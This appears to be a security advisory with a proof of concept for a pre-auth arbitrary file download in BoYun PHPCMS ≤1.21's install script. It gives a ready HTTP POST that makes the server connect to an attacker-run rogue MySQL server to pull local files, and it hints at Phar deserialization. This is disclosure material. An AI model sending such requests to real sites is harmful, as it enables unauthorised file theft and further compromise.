Logo BoYun PHPCMS in file public/install.php has has a Pre-Auth Arbitrary File Download vuln

BoYun PHPCMS in file public/install.php has has a Pre-Auth Arbitrary File Download vuln

BUG_Author:

YELEIPENG

 

Affected version:

≤1.21

 

Vendor:

https://www.boyunweb.cn/

 

Software:

https://www.boyunweb.cn/pc/index57/index/classid/26/id/42.html

 

Vulnerability File:

  • install/install2.php

 

Description:

1.In file install/install2.php, we can  step param step to get_dblist to connect to any other MYSQL server.

Article Image

2. We can connect to other MYSQL Server, and in php≤7.1, we may use local infile to load the file in the client.

We can setup a rogue MYSQL server in our side.

https://github.com/jib1337/Rogue-MySQL-Server

Article Image

3. And now send a request to it to let it connect.

POST /install/install2.php HTTP/1.1
Host: byphpcms1.lab.wetolink.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

db_create=1&db_host=192.168.3.250&db_id=1&db_pass=123456&db_name=test
Article Image

 

Now we get it.

Article Image

By this we may read Phar to trigger unser :)